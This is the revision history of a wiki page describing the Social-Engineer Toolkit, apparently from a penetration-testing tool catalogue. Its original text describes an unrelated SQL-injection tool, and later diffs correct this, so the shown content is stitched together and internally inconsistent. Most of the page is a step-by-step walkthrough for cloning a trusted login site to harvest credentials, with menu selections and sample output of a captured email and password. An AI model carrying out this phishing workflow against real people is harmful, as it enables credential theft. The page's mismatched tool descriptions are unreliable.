Recent changes to SET-en

SET-en modified by Maguey

Maguey — Thu, 12 Dec 2013 17:07:23 -0000

--- v3
+++ v4
@@ -34,30 +34,21 @@
 
 Obtain confidential information from users.
 

+Provides several attack scenarios in order to obtain confidential information for the users such as: Java Applet Attack Method, Metasploit Browser Exploit Method, Credential Harvester Attack Method, Tabnabbing Attack Method, Man Left in the Mtiddle Attack Method, Web Jacking Attack Method, etc.
+
+
+
+
+Obtain access to the users systems.
+

 Provides the functionalities to gain access to the users system in order to compromise the systems such as executing system commands, opening a back door, etc.
 
 

-
-Obtain access to the users systems.
-

-Retrieves the following information 
-
-Database user name.
-
Database name.
-
Database version.
-
Database tables.
-
Database tables schema: keys, fields names and type.
-
-
-
-

 
 Reports:

-Output reports:  ✔
-

-Merge report from the exploitation and data mining in TXT and XML format.
+Output reports:  X

SET-en modified by Maguey

Maguey — Thu, 12 Dec 2013 17:03:04 -0000

--- v2
+++ v3
@@ -63,15 +63,13 @@
 

 Basic usage:
-Realizar un ataque de clonación de un sitio Web para obtener credenciales de acceso de un usuario. El siguiente comando inicia el menú principal de la herramienta.
+Perform a mirror of a trusted web site in order to steal user’s credentials. The following command initiates the tool main menu.

 
 ./set
 



-La herramienta lanza el menú principal, a partir de aquí todo consiste en seleccionar una opción e introducir datos que se soliciten, como son: ip local, URL de sitio a clonar, mensajes informativos, por mencionar algunos.
-
-Elegir la opción número uno Social-Engineering Attacks.
+The main menu displays the tool configuration options; select the first option “Social-Engineering Attacks”.

 
 Select from the menu:
@@ -88,7 +86,7 @@

 



-A continuación elegir la opción número dos Website Attack Vectors.
+Next, select the second option “Website Attack Vectors”.

 

@@ -110,7 +108,7 @@

 



-Ahora para recolectar credenciales de un usuario elegir el vector de ataque Credential Harvester Attack Method, opción número tres.
+Next, select the third option “Credential Harvester Attack Method” in order to harvest the user credentials from a web application.

 

@@ -127,7 +125,7 @@

 



-Elija el modo Site Cloner, opción número dos, esta opción permite indicar cualquier página Web que al usuario le resulte familiar, con el fin de abusar de la confianza que tenga el usuario en el sitio clonado.
+Select the second option “Site Cloner” to provide the trusted web site URL address in order to obtain a local mirror of the site.

 

@@ -139,7 +137,7 @@

 



-Proporcionar la IP de la maquina donde la herramienta regresará las credenciales que logre capturar.
+Provide the IP address of the machine that will harvest the user credentials.

 

@@ -152,7 +150,7 @@

 



-Proporcionar la URL de la página que se clonará para recolectar las credenciales del usuario víctima.
+Provide the trusted web site URL address to be cloned.

 

@@ -161,7 +159,7 @@

 



-La herramienta comienza el proceso para clonación de la página Web que se indicó en el paso anterior.
+The tool will then begin with the cloning process.

 

@@ -174,7 +172,7 @@

 



-En caso de que el servicio de Apache este corriendo, la herramienta solicita confirmación para detenerlo. Detiene el servicio Apache, pública la página Web que clono en el puerto 80 y queda en espera de que una usuario accese a a sito fraudulento.
+Note:  In case an Apache web server is currently running in the harvesting machine on the port 80 the tool will request permission to stop it so the cloned site can be published.

 

@@ -188,9 +186,7 @@

 



-La URL de explotación se conforma de la siguiente manera: http:// IP_PROPORCIONADA/index.html
-
-Cuando la herramienta identifica una conexión a la página que fue clonada, muestra un aviso en la consola. 
+The published “cloned” site will then be available on the URL address: http:// IP_address/index.html. When the process is completed the tool will display a message.

 

@@ -198,7 +194,7 @@

 



-El usuario que ingresa a la página, llena el formulario de acceso con sus credenciales y presiona el botón de para ingresar. Entonces la herramienta captura el request HTTP y lo muestra en consola. 
+When the user access the “cloned” site and provides their user credentials the tool will capture the petition and display the information on the terminal.

 

@@ -220,7 +216,7 @@

 



-Finalmente detenemos la página Web clonada con la combinación de teclas Ctrl + C.
+Finally, the tool can be stopped by pressing the key combination “Ctrl+C”.

SET-en modified by Maguey

Maguey — Thu, 12 Dec 2013 16:59:04 -0000

--- v1
+++ v2
@@ -14,35 +14,32 @@
 

 Description: 
-Security application developed in PHP that helps identify and exploit in an automated way SQL Injection vulnerabilities.
+SET (Social Engineer Toolkit), tool that helps exploiting vulnerabilities in web applications based on the "human factor". It uses social engineering techniques to achieve successful attacks.

 

 Objective:
 
-Automated detection of parameters vulnerable to SQL Injection.
-
Automated and configurable data base data mining.
-
Automated shell upload in order to comprise the application server.
+
Obtain confidential information from users.
+
Obtain access to the users systems.
 

 

 Features:
-Supported technologies: Web applications (HTTP/HTTPS) with a MySQL database backend.
+Supported technologies: Web applications (HTTP/HTTPS).

 Operative mode: Active.

 
-Automated detection of parameters vulnerable to SQL Injection.
-

-Automated parameter tampering for both URL parameters (GET) and form data (POST).
-
Generates a configurable site-map of the application in order to identify all its resources: pages and parameters for further testing.
-
Provides the name of the parameter and URL from the detected vulnerabilities.
+Obtain confidential information from users.
+
+Provides the functionalities to gain access to the users system in order to compromise the systems such as executing system commands, opening a back door, etc.
 
 


 
-Automated and configurable data base data mining.
+Obtain access to the users systems.
 

 Retrieves the following information

SET-en modified by Maguey

Maguey — Thu, 12 Dec 2013 16:13:16 -0000

Back Español

SET

Phase(s):

Primary: Exploitation.
Secondary: N/A.

Description:

Security application developed in PHP that helps identify and exploit in an automated way SQL Injection vulnerabilities.

Objective:

Automated detection of parameters vulnerable to SQL Injection.
Automated and configurable data base data mining.
Automated shell upload in order to comprise the application server.

Features:

Supported technologies: Web applications (HTTP/HTTPS) with a MySQL database backend.

Operative mode: Active.

Automated detection of parameters vulnerable to SQL Injection.

Automated parameter tampering for both URL parameters (GET) and form data (POST).
Generates a configurable site-map of the application in order to identify all its resources: pages and parameters for further testing.
Provides the name of the parameter and URL from the detected vulnerabilities.

Automated and configurable data base data mining.

Retrieves the following information
- Database user name.
- Database name.
- Database version.
- Database tables.
- Database tables schema: keys, fields names and type.

Reports:
Output reports: ✔

Merge report from the exploitation and data mining in TXT and XML format.

Basic usage:

Realizar un ataque de clonación de un sitio Web para obtener credenciales de acceso de un usuario. El siguiente comando inicia el menú principal de la herramienta.

./set

La herramienta lanza el menú principal, a partir de aquí todo consiste en seleccionar una opción e introducir datos que se soliciten, como son: ip local, URL de sitio a clonar, mensajes informativos, por mencionar algunos.

Elegir la opción número uno Social-Engineering Attacks.

Select from the menu: 1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About 99) Exit the Social-Engineer Toolkit

A continuación elegir la opción número dos Website Attack Vectors.

Select from the menu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules

99) Return back to the main menu.

Ahora para recolectar credenciales de un usuario elegir el vector de ataque Credential Harvester Attack Method, opción número tres.

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Mtiddle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Create or import a CodeSigning Certificate 99) Return to Main Menu

Elija el modo Site Cloner, opción número dos, esta opción permite indicar cualquier página Web que al usuario le resulte familiar, con el fin de abusar de la confianza que tenga el usuario en el sitio clonado.

1) Web Templates
2) Site Cloner
3) Custom Import

99) Return to Webattack Menu

Proporcionar la IP de la maquina donde la herramienta regresará las credenciales que logre capturar.

set:Webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a Website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:Webattack> IP address for the POST back in Harvester/Tabnabbing: 127.0.0.1

Proporcionar la URL de la página que se clonará para recolectar las credenciales del usuario víctima.

[-] Example: http://www.thisisafakesite.com
set:Webattack> Enter the url to clone: URL_A_CLONAR.

La herramienta comienza el proceso para clonación de la página Web que se indicó en el paso anterior.

[*] Cloning the Website: https://login.url.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a Website.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80

En caso de que el servicio de Apache este corriendo, la herramienta solicita confirmación para detenerlo. Detiene el servicio Apache, pública la página Web que clono en el puerto 80 y queda en espera de que una usuario accese a a sito fraudulento.

[*] Information will be displayed to you as it arrives below:
[*] Looks like the Web_server can't bind to 80. Are you running Apache?
Do you want to attempt to disable Apache? [y/n]: y
* Stopping Web server
apache2
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
... waiting
[ OK ]
[*] Successfully stopped Apache. Starting the credential harvester.
[*] Harvester is ready, have victim browse to your site.

La URL de explotación se conforma de la siguiente manera: http:// IP_PROPORCIONADA/index.html

Cuando la herramienta identifica una conexión a la página que fue clonada, muestra un aviso en la consola.

IP_USUARIO - - [14/Nov/2013 16:43:15] "GET / HTTP/1.1" 200 -

El usuario que ingresa a la página, llena el formulario de acceso con sus credenciales y presiona el botón de para ingresar. Entonces la herramienta captura el request HTTP y lo muestra en consola.

[*] WE GOT A HIT! Printing the output:
PARAM: lsd=AVpgu8gq
PARAM: display=
PARAM: enable_profile_selector=
PARAM: legacy_return=1
PARAM: profile_selector_ids=
PARAM: trynum=1
PARAM: timezone=360
PARAM: lgnrnd=144204_hbWo
PARAM: lgnjs=1384469624
POSSIBLE USERNAME FIELD FOUND: email= usuario@hotmail.com
POSSIBLE PASSWORD FIELD FOUND: pass= micontrasena12345
PARAM: persistent=1
PARAM: default_persistent=0
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

Finalmente detenemos la página Web clonada con la combinación de teclas Ctrl + C.

Resources:

Link: https://www.trustedsec.com/downloads/social-engineer-toolkit/
Author(s): David Kennedy
Contact: irc.freenode.net canal #setoolkit
License: BSD licensing